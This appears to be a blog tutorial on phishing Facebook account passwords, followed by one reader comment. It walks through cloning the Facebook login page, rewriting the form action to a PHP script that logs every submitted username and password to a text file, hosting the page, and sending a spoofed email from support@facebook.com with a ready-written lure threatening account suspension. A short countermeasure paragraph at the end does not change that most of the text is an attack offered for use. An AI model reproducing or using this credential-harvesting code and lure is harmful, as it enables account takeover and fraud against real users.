In this tutorial we will discus how you can hack Facbook account
password by phishing. Phishing is act of creating a replica of
legitimate website for stealing passwords and credit card numbers etc.
Here I will show you how you can create replica of facebook log-in page
and then fool your victim to put his username and password in it so that
you can get his account password
.
.
First of all open www.facebook.com in your web browser, from “file” menu select “save as” and type “Facebook” in file name and select “web page complete” from save as menu. Once done you will have a file named “Facebook.html” and a folder named “Facebook_files”. Folder will have several files in it, let them as it is and open Facebook.html in notepad or word-pad. From edit menu select find, type action in it and locate following string.
action="https://www.facebook.com/login.php?login_attempt=1"
Now replace this string with
action= “mail.php”
Now open notepad type following code in it and create mail.php.
Code:
<?php
header ('Location: https://www.facebook.com/login.php?login_attempt=1 ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Now save it as mail.php and create an empty log.txt file. Now you'll need a free web hosting service that supports PHP. Go to http://www.100best-free-web-space.com/ and select service and plan that suits you. Now in root folder of your website create Facebook_files folder and upload all files in Facebook_files
of your hard disk to it. Come back to root folder and upload
Facebook.html, mail.php and log.txt in it. Change permission for log.txt
that it can be seen by administrator only. Once done make Facebook.html your index page and make site live.
Now sign up with http://www.hoaxmail.co.uk/ it provides spoofed email service. Now create a message from support@facebook.com to your victim.
Sub: Invalid activity on your facebook account
Body:
Dear facebook user (victim's facebook user name),
Recently
we saw some suspicious activity on your account, we suspect it as a
malicious script. As a valuable user to us we understand this might be
system error, if the activity is not generated by you then please log-in
to your account by following link,
<link to phished site>
Failing
to log-in within next 48 hours Facebook holds right to suspend your
account for sake of privacy of you and others. By logging in you'll
confirm it is system error and we will fix it in no time. Your
inconvenience is regretted. Thank you.
support@facebook.com,
Facebook, Inc,
1601 S.California Ave
Palo Alto CA 94394
US
If
your victim is not security focused, he/she will surely fall prey to
it. And will log-in using phished site handing you his password in
log.txt file. Pleas note that you must use that email id of victim which
he/she uses to log in facebook. If you are in his/her friend list then
click on information tab to know log-in email ID.
Countermeasure:
You
must not reply any message from facebook may it be legitimate or not by
clicking on any links that appear in mail box. Better whenever you
receive any mail of this type report it to facebook.com by logging via
typing www.facebook.com in your web browser.
1 comments:
This was a good read. Only thing is the header redirect in the main.php causes an error.
Post a Comment